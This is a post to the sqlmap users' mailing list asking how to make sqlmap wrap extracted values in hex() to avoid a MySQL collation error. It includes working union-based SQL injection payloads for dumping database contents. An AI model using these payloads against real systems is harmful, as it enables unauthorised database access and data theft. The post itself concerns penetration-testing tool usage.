Hi,

I'm using sqlmap mostly for exploiting a sqli/dumping contents.

In the current case I've got a simple union based sqli in a MySQL 4.1.x DB.

..&x=foo union select 1,1,1,1 --
(works)

..&x=foo union select 1,user(),1,1 --
(doesn't work: Illegal mix of collation)

To work around the collation issue I used hex() to manually extract
information:
..&x=foo union select 1,hex(user()),1,1 --
(works)

Usually I try to give sqlmap all the information it needs to quickly
confirm a manually found sqli.

sqlmap ....  --technique=U --union-char=1 --union-cols=4

detects the sqli but when trying to actually extract information it runs
into the mix of collations problem and suggests using the 'hidden'
switch --no-cast, which doesn't solve the problem.

Is there a way to tell sqlmap to use hex() to work around the collation
issue?

thanks

_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
